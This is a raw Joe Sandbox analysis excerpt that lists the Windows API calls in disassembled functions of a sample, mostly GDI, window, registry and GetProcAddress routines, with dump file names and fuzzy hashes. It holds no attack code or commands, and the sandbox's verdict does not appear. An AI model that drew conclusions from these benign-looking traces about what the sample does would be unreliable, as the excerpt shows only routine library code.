                                                                                              • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                            • GetFocus.USER32 ref: 0041C168
                                                                                            • GetDC.USER32(?), ref: 0041C174
                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                            • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                            • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3303097818-0
                                                                                            • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                            • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                            • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                            • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                            • 6FA82980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                              • Part of subcall function 004107F8: 6FA7C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                            • 6FAECB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                            • 6FAEC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                            • 6FAECB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                            • 6FA80860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$A80860A82980C400C740
                                                                                            • String ID:
                                                                                            • API String ID: 265698141-0
                                                                                            • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                            • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                            • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                            • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                            • API String ID: 47109696-2530820420
                                                                                            • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                            • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                            • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                            • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                            APIs
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                                            • String ID:
                                                                                            • API String ID: 1458357782-0
                                                                                            • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                            • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                            • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                            • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 004233AF
                                                                                            • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                            • SetCursor.USER32(00000000), ref: 00423413
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1770779139-0
                                                                                            • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                            • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                            • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                            • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                            • API String ID: 667068680-2254406584
                                                                                            • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                            • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                            • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                            • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                            • API String ID: 190572456-212574377
                                                                                            • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                            • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                            • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                            • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                            • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                              • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                              • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                              • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                            • API String ID: 142928637-2676053874
                                                                                            • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                            • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                            • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                            • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                            • API String ID: 2238633743-1050967733
                                                                                            • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                            • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                            • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                            • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                            • API String ID: 667068680-222143506
                                                                                            • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                            • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                            • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                            • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B57E
                                                                                            • GetDC.USER32(?), ref: 0041B58A
                                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                            • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2502006586-0
                                                                                            • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                            • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                            • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                            • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                            • API String ID: 1452528299-1580325520
                                                                                            • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                            • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                            • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                            • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                            • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                                            • String ID:
                                                                                            • API String ID: 447804332-0
                                                                                            • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                            • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                            • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                            • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$Show
                                                                                            • String ID:
                                                                                            • API String ID: 3609083571-0
                                                                                            • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                            • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                            • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                            • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                            APIs
                                                                                              • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
